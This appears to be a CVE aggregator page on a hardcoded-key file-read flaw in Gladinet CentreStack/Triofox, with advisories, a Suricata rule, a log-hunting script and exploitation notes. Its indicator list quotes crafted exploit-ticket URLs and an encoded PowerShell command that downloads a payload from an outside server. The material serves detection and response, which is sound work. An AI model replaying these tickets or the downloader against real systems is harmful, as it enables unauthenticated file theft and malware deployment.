CVE-2025-14611
Published 2025-12-12
Priority P1 (96) · critical 9.8 (CVSS 3.1: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H) · KEV · ITW · Exploit
CISA Known Exploited Vulnerability (due 2026-01-05)
Exploited in the wild
EPSS: 50.95% (98.8th percentile)
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gladinet | centrestack | < 16.12.10420.56791 | 16.12.10420.56791 |
| gladinet | centrestack_and_triofox | < 16.12.10420.56791 | 16.12.10420.56791 |
| gladinet | triofox | < 16.12.10420.56791 | 16.12.10420.56791 |
Detection & IOCs (extracted from sources)
- URL: /storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu
- URL: /storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsukOQzFIwOzIHswJBdS7w0RY
- URL: /storage/filesvr.dn t=t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m4mxEjYeJuI6Nk:xBHQQ1c6Hzjx3OsG4T044CP5qZ9Qr
- Command: "C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=
- YARA / regex: `decryptionKey="([A-Fa-f0-9]+)"`
- Hunt for requests to /storage/filesvr.dn with a `t` query parameter in IIS logs; this is the vulnerable HTTP handler endpoint. Tickets with a timestamp of year 9999 indicate a crafted never-expiring exploit ticket.
- Look for Windows Application Event Log Event ID 1316 to identify ViewState deserialization exploitation attempts; the event captures the encoded payload and source IP.
- Audit file access logs for unauthorized reads of web.config, particularly at C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config, which contains the machine keys used for ViewState deserialization attacks.
- Review Access Tickets for year 9999 timestamps in the `t` parameter of filesvr.dn requests as a high-fidelity indicator of exploitation.
- The exploit ticket's `t` parameter uses URL-safe character substitution (`:` replaces `+`, `|` replaces `/`) before Base64 decoding; detection rules should account for this encoding when parsing IIS logs.
- Check for web.config exfiltration attempts, and rotate all stored credentials and API keys if web.config access is confirmed.
- The Username and Password fields in observed exploit tickets were left blank. When empty strings are passed, the impersonation logic may fail and fall back to the IIS Application Pool Identity, meaning exploitation does not require valid credentials.
- Attribution of the December 15 incidents to the cl0p ransomware group is unconfirmed at the time of reporting; treat the associated IPs and the conqueror.exe payload as high-confidence IOCs, but treat actor attribution as tentative.
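The following Python script is an added example, not code from this page or from any of the quoted vendors. It applies two of the hunts above to a few constructed IIS log lines: it picks out requests to /storage/filesvr.dn that carry a `t` parameter, undoes the URL-safe substitution (`:` for `+`, `|` for `/`) described above, checks that the result decodes as Base64, and compares it with the ticket prefix published in the ET Suricata rule further down this page. Reading the ticket's expiry (the year-9999 check) would require decrypting it with the product's AES key, which this page does not contain, so the script treats every filesvr.dn ticket as a hunt candidate and marks only the published prefix as a known IOC. A second function applies the `decryptionKey` regex listed above to a response body or file, as a leaked-machine-key check. The IIS field layout, the log lines and the web.config fragment are all assumptions constructed for the example.

```python
import base64
import re
from urllib.parse import unquote

# Ticket prefix carried in the ET Suricata rule for CVE-2025-14611 (from the page).
KNOWN_TICKET_PREFIX = (
    "vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:"
    "8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m"
)

# Regex from the Nuclei/YARA entry: an ASP.NET machineKey decryptionKey in web.config.
DECRYPTION_KEY_RE = re.compile(r'decryptionKey="([A-Fa-f0-9]+)"')

# Raw `t=` value from an IIS cs-uri-query field (no percent-decoding yet, so '+' is untouched).
TICKET_PARAM_RE = re.compile(r"(?:^|&)t=([^&]*)")

# Assumed IIS W3C field order for the constructed sample below.
IIS_FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
              "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]

# Constructed sample log, not real telemetry. Line 2 reuses the published IOC ticket,
# line 3 is a syntactically valid but unknown ticket, line 4 is not Base64 at all.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-12-15 03:12:44 10.0.0.5 GET /portal/loginpage.aspx - 443 - 192.0.2.10 Mozilla/5.0 200
2025-12-15 03:12:51 10.0.0.5 GET /storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu 443 - 192.0.2.10 python-requests/2.31 200
2025-12-15 03:13:02 10.0.0.5 GET /storage/filesvr.dn t=QUJDREVGR0hJSktMTU5PUA 443 - 198.51.100.7 Mozilla/5.0 200
2025-12-15 03:13:09 10.0.0.5 GET /storage/filesvr.dn t=not%20base64!!! 443 - 198.51.100.7 Mozilla/5.0 400
"""

# Constructed web.config fragment with placeholder keys.
SAMPLE_WEB_CONFIG = ('<machineKey validationKey="PLACEHOLDER" '
                     'decryptionKey="0123456789ABCDEF0123456789ABCDEF" '
                     'validation="SHA1" decryption="AES" />')


def normalize_ticket(raw_ticket: str) -> str:
    """Percent-decode, undo the ':'->'+' and '|'->'/' substitution, and pad to standard Base64."""
    decoded = unquote(raw_ticket)
    std = decoded.replace(":", "+").replace("|", "/")
    return std + "=" * ((-len(std)) % 4)


def decodes_as_base64(raw_ticket: str) -> bool:
    """True when the normalized ticket is strictly valid Base64 (alphabet and padding)."""
    try:
        base64.b64decode(normalize_ticket(raw_ticket), validate=True)
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


def hunt_filesvr_tickets(log_text: str) -> list:
    """One finding per /storage/filesvr.dn request carrying a `t` parameter."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(IIS_FIELDS):
            continue  # unexpected layout; skip rather than mis-map fields
        rec = dict(zip(IIS_FIELDS, parts))
        if rec["cs-uri-stem"].lower() != "/storage/filesvr.dn":
            continue
        match = TICKET_PARAM_RE.search(rec["cs-uri-query"])
        if not match:
            continue
        ticket = match.group(1)
        findings.append({
            "time": f'{rec["date"]} {rec["time"]}',
            "client": rec["c-ip"],
            "ticket": ticket,
            "valid_base64": decodes_as_base64(ticket),
            "known_ioc": unquote(ticket).startswith(KNOWN_TICKET_PREFIX),
        })
    return findings


def find_leaked_machine_keys(body: str) -> list:
    """Apply the page's decryptionKey regex to a response body or file content."""
    return DECRYPTION_KEY_RE.findall(body)


if __name__ == "__main__":
    for finding in hunt_filesvr_tickets(SAMPLE_LOG):
        print(finding)
    print(find_leaked_machine_keys(SAMPLE_WEB_CONFIG))
```

The `t` value is taken from the raw query string rather than through `urllib.parse.parse_qs`, because `parse_qs` would turn any literal `+` into a space before the substitution is reversed; percent-decoding happens only inside `normalize_ticket`. On a real server, point `hunt_filesvr_tickets` at the IIS log file contents and adjust `IIS_FIELDS` to the `#Fields:` header of that site.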
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 7.1 | HIGH | CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 7.1 | HIGH | |
| cisa | | 7.1 | HIGH | |
CISA
Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
cisa·2025-12-15·CVSS 7.1
CVE-2025-14611 [HIGH] CWE-798 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
Affected: Gladinet CentreStack and Triofox
Gladinet CentreStack and TrioFox contain a hardcoded cryptographic keys vulnerability for their implementation of the AES cryptoscheme. This vulnerability degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.centrestack.com/p/gce_latest_release.html ; https://access.triofox.com/releases_history/; https://support.centrestack.com/hc/en-
GHSA
GHSA-j7r7-3wrm-f59w: Gladinet CentreStack and Triofox prior to version 16
ghsa_unreviewed·2025-12-12
CVE-2025-14611 [HIGH] CWE-798 GHSA-j7r7-3wrm-f59w: Gladinet CentreStack and Triofox prior to version 16
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
VulnCheck
Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
vulncheck·2025·CVSS 7.1
CVE-2025-14611 [HIGH] CWE-798 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
Gladinet CentreStack and TrioFox contain a hardcoded cryptographic keys vulnerability for their implementation of the AES cryptoscheme. This vulnerability degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication.
Affected: Gladinet CentreStack and Triofox
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability; https://www.cisa.gov
Suricata
ET WEB_SPECIFIC_APPS Gladinet CentreStack/Triofox Hardcoded AES Key Arbitrary File Read (CVE-2025-14611)
suricata·2025-12-18·CVSS 7.1
CVE-2025-14611 [HIGH] ET WEB_SPECIFIC_APPS Gladinet CentreStack/Triofox Hardcoded AES Key Arbitrary File Read (CVE-2025-14611)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Gladinet CentreStack/Triofox Hardcoded AES Key Arbitrary File Read (CVE-2025-14611)"; flow:established,to_server; http.uri; content:"/storage/filesvr.dn?"; content:"t|3d|vghpI7EToZUDIZDdprSubL3mTZ2|3a|aCLI|3a|8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m"; fast_pattern; pcre:"/^(?:\x7cGbA\x7cRIwrK0WT6jLb\x3aulpCaAEZ7n1cnc6XQR3EtoADI|\x3aZDplEYEsO5ksZajiXcsu(?:mkDyUgpV5VLxL\x7c372varAu|kOQzFIwOzIHswJBdS7w0RY))/R"; reference:url,www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability; reference:cve,2025-14611; classtype:web-application-attack; sid:2066362; rev:1;)
Nuclei
Gladinet CentreStack & Triofox - Hardcoded Credentials
nuclei·CVSS 7.1
CVE-2025-14611 [HIGH] Gladinet CentreStack & Triofox - Hardcoded Credentials
Gladinet CentreStack and Triofox (the template text is truncated in the source; only the tail of the matchers and the extractor survive):

```yaml
      # ...preceding matcher lines are cut off in the source
      ","")'
      - 'contains_any(header, "application/xml","text/xml","application/octet-stream")'
    condition: and
    extractors:
      - type: regex
        part: body
        name: decryption_key
        group: 1
        regex:
          - 'decryptionKey="([A-Fa-f0-9]+)"'
# digest: 4a0a0047304502203460345f0ae0faebf12e4e95a52625787b5de9a1b284ff55a0b0f2f8d0882a76022100cb98226fff7fcba505fec6b8521181ce320d0e87cdeb4b9a489e117417739947:922c64590222798bb761d5b6d8e72950
```
Rapid7
Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum
blogs_rapid7·2026-06-05·CVSS 8.8
CVE-2026-34197 [HIGH] Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum
## When Open Source is a bit too Open
Several fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their branch --exec and requesting a rebase.
Another useful post module by CharlesQuinnDev enumerates the Kernel pointers leaked via the popular NtQuerySystemInformation technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several local privilege escalations already use that technique, so exposing just that technique was a great call!
## New module content (3)
## Apache ActiveMQ RCE via Jolokia addNetworkConnector
Authors: dinosn and h00die
Type: Exploit
Pull request: #21497 c
Recorded Future
December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
blogs_recorded_future·2026-01-13·CVSS 10.0
CVE-2025-55182 [CRITICAL] December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
## December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.
What security teams need to know:
- React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
- China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
- Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
blogs_huntress·2025-12-18
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe:
"C:\Windows\System32\cmd.exe" /c powers
Wiz
CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-14611 [HIGH] CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14611: Gladinet CentreStack vulnerability analysis and mitigation
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Source: NVD
- Score: 7.1
- Published: December 12, 2025
- Severity: HIGH
- CNA Score: 7.1
- Affected Technologies: Gladinet CentreStack
- Has Public Exploit: Yes
- Has CISA KEV Exploit: Yes
- CISA KEV Release Date: N/A
- CISA KEV Due Date: N/A
- Exploitation Probability: Pe

Timeline
- 2025-12-12: Published
- 2025-12-15: Added to CISA KEV
- Exploited in the wild